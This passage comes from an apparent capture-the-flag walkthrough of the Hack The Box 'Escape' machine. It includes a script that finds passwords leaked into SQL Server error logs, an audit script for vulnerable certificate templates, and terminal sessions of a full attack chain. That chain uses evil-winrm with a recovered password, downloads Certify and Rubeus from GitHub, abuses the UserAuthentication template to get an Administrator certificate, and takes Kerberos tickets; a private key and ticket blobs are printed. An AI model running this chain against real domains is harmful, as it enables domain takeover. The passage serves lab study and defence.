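# SQL Server writes the login name it was given verbatim, so a failed logon whose
# "user" is really a password shows up right after a failed logon for the real account.
FAILED_LOGON = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*?\[CLIENT: (?P<client>[^\]]+)\]"
)

REASON = "Reason: Password did not match that for the login provided."

# Constructed sample: the two real lines from this box's ERRORLOG.BAK (Ryan.Cooper and
# NuclearMosquito3) plus invented 'sa' and 'Tom' failures that must NOT be flagged.
SAMPLE_LOG = [
    "2022-11-18 13:43:07.30 spid51 Changed database context to 'master'.",
    "2022-11-18 13:43:07.40 Logon Error: 18456, Severity: 14, State: 8.",
    f"2022-11-18 13:43:07.40 Logon Logon failed for user 'sa'. {REASON} [CLIENT: 10.10.14.2]",
    "2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.",
    f"2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\\Ryan.Cooper'. {REASON} [CLIENT: 127.0.0.1]",
    "2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.",
    f"2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. {REASON} [CLIENT: 127.0.0.1]",
    f"2022-11-18 13:45:01.00 Logon Logon failed for user 'sequel.htb\\Tom'. {REASON} [CLIENT: 10.10.14.2]",
]

# Assumption: in practice pull this from sys.server_principals on the instance.
KNOWN_LOGINS = {"sa", "PublicUser", "sequel.htb\\Ryan.Cooper", "sequel.htb\\Tom"}


def parse_failed_logons(lines: Iterable[str]) -> List[Tuple[datetime, str, str]]:
    """Return (timestamp, supplied login name, client) for every failed-logon line."""
    events = []
    for line in lines:
        m = FAILED_LOGON.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events


def find_leaked_passwords(lines: Iterable[str], known_logins: Iterable[str],
                          window: timedelta = timedelta(seconds=5)) -> List[Dict[str, str]]:
    """Pair a failed logon for a known login with the next failed logon from the same
    client, within `window`, whose 'user' is not a known login: that value is very
    likely the account's password (or a close attempt at it)."""
    known = {k.lower() for k in known_logins}
    events = parse_failed_logons(lines)
    findings = []
    for (prev_ts, prev_user, prev_client), (cur_ts, cur_user, cur_client) in zip(events, events[1:]):
        if (prev_user.lower() in known
                and cur_user.lower() not in known
                and prev_client == cur_client
                and timedelta(0) <= cur_ts - prev_ts <= window):
            findings.append({"account": prev_user, "leaked_value": cur_user,
                             "client": cur_client, "at": cur_ts.isoformat()})
    return findings


if __name__ == "__main__":
    for f in find_leaked_passwords(SAMPLE_LOG, KNOWN_LOGINS):
        print(f"{f['at']} {f['client']}: '{f['leaked_value']}' looks like the password of {f['account']}")
```

Run it against a real ERRORLOG (or the .BAK rotations next to it); every hit is a credential to rotate and a log file whose ACL needs tightening, since the log is readable by far more principals than the password it now contains.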
Establish a remote connection - Ryan.Cooper
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
sequel\ryan.cooper S-1-5-21-4078382237-1492182817-2568127209-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read flag: user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/2/2024 1:25 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
d856abeedae532b8bbec897aca69d2de
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
Privilege Escalation
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe ; file Rubeus.exe
--2024-04-02 15:42:23-- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Rubeus.exe [following]
--2024-04-02 15:42:23-- https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Rubeus.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 446976 (436K) [application/octet-stream]
Saving to: ‘Rubeus.exe’
Rubeus.exe 100%[===========================================>] 436.50K --.-KB/s in 0.1s
2024-04-02 15:42:24 (4.00 MB/s) - ‘Rubeus.exe’ saved [446976/446976]
Rubeus.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Certify.exe ; file Certify.exe
--2024-04-02 15:43:33-- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Certify.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Certify.exe [following]
--2024-04-02 15:43:34-- https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Certify.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 174080 (170K) [application/octet-stream]
Saving to: ‘Certify.exe’
Certify.exe 100%[===========================================>] 170.00K --.-KB/s in 0.06s
2024-04-02 15:43:34 (2.61 MB/s) - ‘Certify.exe’ saved [174080/174080]
Certify.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /mnt/oscp/writeups/HTB/HTB_Escape/Certify.exe
Info: Uploading /mnt/oscp/writeups/HTB/HTB_Escape/Certify.exe to C:\Users\Ryan.Cooper\Desktop\Certify.exe
Data: 232104 bytes of 232104 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /mnt/oscp/writeups/HTB/HTB_Escape/Rubeus.exe
Info: Uploading /mnt/oscp/writeups/HTB/HTB_Escape/Rubeus.exe to C:\Users\Ryan.Cooper\Desktop\Rubeus.exe
Data: 595968 bytes of 595968 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2024 2:50 PM 174080 Certify.exe
-a---- 4/2/2024 2:50 PM 446976 Rubeus.exe
-ar--- 4/2/2024 1:25 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
Check the remote host for vulnerable certificate templates
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.1166693
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
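The Certify output above lists the template properties that together make UserAuthentication abusable: the enrollee supplies the subject, the EKUs include Client Authentication, no manager approval or authorized signatures are required, and Domain Users hold the Enroll right. As an added example (not part of the original writeup and not Certify's own code), the script below encodes those conditions as an audit check and shows the minimal template change that removes them. The flag and EKU constants are the AD CS schema values; the `Template` class and the `harden` function are this example's own constructs, and the template values are copied from the Certify output.

```python
# Added example (not from the original writeup): audit the conditions Certify
# reported for the 'UserAuthentication' template and show a hardened copy.
# Flag bits are the msPKI-* schema values; Template/harden are this example's own.
from dataclasses import dataclass, replace

# msPKI-Certificate-Name-Flag bit
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bits
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002      # "CA certificate manager approval"
CT_FLAG_PUBLISH_TO_DS = 0x00000008

# EKU OIDs that allow a certificate to be used for Kerberos PKINIT logon
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
EKU_OIDS = {                   # the three EKUs Certify listed for the template
    "Client Authentication": "1.3.6.1.5.5.7.3.2",
    "Encrypting File System": "1.3.6.1.4.1.311.10.3.4",
    "Secure Email": "1.3.6.1.5.5.7.3.4",
}
# Principals whose Enroll right means "any domain account can enroll"
LOW_PRIV_WELL_KNOWN = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # Everyone, Authenticated Users, BUILTIN\Users
LOW_PRIV_RIDS = {"513", "515"}                                  # Domain Users, Domain Computers


@dataclass(frozen=True)
class Template:
    name: str
    name_flag: int          # msPKI-Certificate-Name-Flag
    enrollment_flag: int    # msPKI-Enrollment-Flag
    ra_signatures: int      # msPKI-RA-Signature (authorized signatures required)
    ekus: frozenset         # pKIExtendedKeyUsage OIDs
    enroll_sids: frozenset  # SIDs that hold the Enroll right


def low_privileged(sid: str) -> bool:
    """True for well-known broad groups or a domain SID ending in a low-priv RID."""
    return sid in LOW_PRIV_WELL_KNOWN or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc1_findings(t: Template) -> list:
    """Return the conditions the template satisfies; all five together are the problem."""
    findings = []
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("ENROLLEE_SUPPLIES_SUBJECT: requester chooses subject and SAN")
    if t.ekus & AUTH_EKUS:
        findings.append("EKU allows client authentication (PKINIT)")
    if not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no CA manager approval required")
    if t.ra_signatures == 0:
        findings.append("no authorized signatures required")
    if any(low_privileged(s) for s in t.enroll_sids):
        findings.append("low-privileged principals hold the Enroll right")
    return findings


def is_esc1(t: Template) -> bool:
    return len(esc1_findings(t)) == 5


def harden(t: Template) -> Template:
    """Minimal fix: the CA builds the subject from AD, and every request waits
    for manager approval. Narrowing the Enroll ACE is the other common fix."""
    return replace(
        t,
        name_flag=t.name_flag & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        enrollment_flag=t.enrollment_flag | CT_FLAG_PEND_ALL_REQUESTS,
    )


DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"   # sequel.htb, from the Certify output

# Template values as Certify reported them for sequel.htb
USER_AUTHENTICATION = Template(
    name="UserAuthentication",
    name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    enrollment_flag=CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS,
    ra_signatures=0,
    ekus=frozenset(EKU_OIDS.values()),
    enroll_sids=frozenset({f"{DOMAIN_SID}-512", f"{DOMAIN_SID}-513", f"{DOMAIN_SID}-519"}),
)

if __name__ == "__main__":
    for t in (USER_AUTHENTICATION, harden(USER_AUTHENTICATION)):
        print(t.name, "-> vulnerable" if is_esc1(t) else "-> ok")
        for f in esc1_findings(t):
            print("  -", f)
```

The same attributes can be pulled from a real forest with `Get-ADObject` against `CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...` (properties `msPKI-Certificate-Name-Flag`, `msPKI-Enrollment-Flag`, `msPKI-RA-Signature`, `pKIExtendedKeyUsage`) and the Enroll ACEs from `nTSecurityDescriptor`; Certify reads exactly those and also checks the other escalation categories this example does not cover.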
Request a new certificate with Administrator as the alternative name
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 13
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsCdZPTk1EOeDrmfraPlyM+wAlmbUgqWwGyMLA/DYc4HRoi0x
7IS9/NmSmEQACUcu7+9IQuuphxAR/tRRsMUYxLQwrCvgJg4D16+RR/pPwuKFSXse
wH4muE2MlTSr0jSD1vzCQGUs6Hqr//T1KZhFGYyDrcTaUaUPZw2/bgb//W6gtcFe
usYMT5cgZKSObPWV0Nr07Fvi3QkzJcboC4sYa3QKp3AlzzYfeWt/4u0twelMSN+C
85OWKDB8G1iMYkEyQzovfzxyLAw5LCnNABuUB2H+fWuQQ/zXY/rRPD03fiufnGAz
ACbW0aEYBMkTaRzmctCnXYS5F/bDhLhAMQzt0QIDAQABAoIBAD+PQxzbKnGaB6KD
bqam8vUXH7MlEWK+pAd2on/ehEtROTHaOtxLnT3Bx6pXRugSHjaG0T0MSVQpkUSw
mXU9+Mzo83L8NdmlTu+hMruU7vizwUIdQaBVJGV13dbsdV7YggWtl+2iVAziTnOB
kIBcp/orAExP7jJta1xU0pDBx9ZKXgrKhGrQEJUHoLzLxK1baC6ZPhkXwzG9DWVC
uNPZBi+ycbp9wbBs7T19Y68EPbr+wELMt2nDK00kGF/F9bITFfATukoARQTuoOfe
YLfcAuobjkrw4OPoqDevajyB3F/zjKyftJBfoCwxt/c/IVXyv3pcwsUfGjBle2lu
McEQH90CgYEA4EgKxfHaNwn5VU/ho56fPp9rVw3aGnSnwsIyN1zxLVWWm/pW3/pk
yHyb2ycwC8oIXBldbOO5aSSoFIiU1i/BpBjvTjdGJ16ory+YRi1Th+vJl4VSv4BX
XxqWQK6wXbHAOs2568UcaTiVpettfgOaRL5P3ZHVx7SGBI8LqB7u788CgYEAyRDg
CT2egqBCZItgEldAYT1OssrAT2PzPaJAK+KqIpfCEhgCkaSixTkgTi0IWpBCP9u0
gsrEEZPex2JIUume5WuQwdh7VNi3bj7Jk6kKKdsnjHm5cO+KGcMXOa0Kq66mK+/Z
M4QMbMx1RGG0yF0vK5JbCXQEQip3n1lXd86LEF8CgYEA0JjwvC43QR2bswc62806
Wyo20Z7mjdiV94Ra5DcjcYC7NZNena7rcbTD2M7X1v8vS0mkJRSga/RWB9MIazW7
qn4uhNbP/uoBhf6EaDDcEfzxYGX2EnqxyJiXys0u59Xc7lRNacXIqOyh8tHG4n9D
SlCfQ3rSFI4IX9ETjGhI3u0CgYBRAPZxYpzQnYYCAdCzsukiA9QH3f06PtdJNmvK
AmhuxVsPdRLb4EsfT9N/C095RPMbzQTdSJlTR5KSGztuA+bbIMnR/sg5N5I23R7S
2WBZ2owFYSjfofGuTVW3C8rnvdX+j4Oe6I0k6/42jXKK4lfVowIAPfhVO8yzqwe9
Ib4O2wKBgQCZRB1Y1i9F/0yltsryCXs9jIwJasntW0BCf7SOd0fwhK5Ky358UDwY
vl9GuD8hbNBRzsaq3Kl228s5BYygQfRBfi6iDX5ljatFPR5NbSdNyGeQRvWZSwHt
V0K1Od/pd8y5RwBAnfFwpGHkWJUCFR/oDN93wd0k84z99XI3rgSZwg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.1103954
Convert cert.pem to certificate cert.pfx
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ ls -l cert.*
-rwxr-xr-x 1 kali kali 3846 Apr 2 22:25 cert.pem
-rwxr-xr-x 1 kali kali 3425 Apr 3 07:06 cert.pfx
Upload cert.pfx to the remote host
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /mnt/oscp/writeups/HTB/HTB_Escape/cert.pfx
Info: Uploading /mnt/oscp/writeups/HTB/HTB_Escape/cert.pfx to C:\Users\Ryan.Cooper\Desktop\cert.pfx
Data: 4564 bytes of 4564 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/3/2024 6:17 AM 3425 cert.pfx
-a---- 4/3/2024 6:08 AM 174080 Certify.exe
-a---- 4/3/2024 6:07 AM 446976 Rubeus.exe
-ar--- 4/3/2024 5:57 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
Run Rubeus - Pass-The-Ticket
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::ac0f:1ee0:3c99:6c3c%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
[+] Ticket successfully imported!
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 4/3/2024 6:20:19 AM
EndTime : 4/3/2024 4:20:19 PM
RenewTill : 4/10/2024 6:20:19 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : IjVm0I1X+YWLe986VSbIyA==
ASREP (key) : 89E82470ADA2642221D8379A3A87C1BA
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::ac0f:1ee0:3c99:6c3c%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBL+/cOGHSdZS
3ohX14OtjRfHcscLoxz2kXODAz1VF/qkMldTM6y8J+y6sWBMAku7KEf9jB5ZwwHbtAT4aoX/0Za+CzFD
z3mKIdITF7KDOIaB8V/YsMlsVZVegFgT/BTH2tUi3O3N/OxMsqSEwhYFcb+rMpk/McnuLJwcq59M/a7x
hKNHB+1e6nckC61WQfOzSzG8oaPLz3C8wQ6jylHipqVBsWk2zRNDcQitf2qAxlm/hTQMQ0IseM9uDt5M
B5d5xKwPD/6dXLKlYIcgLKX2/v6O01g5NPbA5Fi0FkELGVq/SB+AAUKA8J3jguqTdJ0KH2MMF9Yq0YqC
/PM/teEq1d2mj9bhLwo5Z5LjIhKszTjemI3oIzwNabnbiDu+BBDGr00Fjh6NktjdOChOrvZt7xCWrYWj
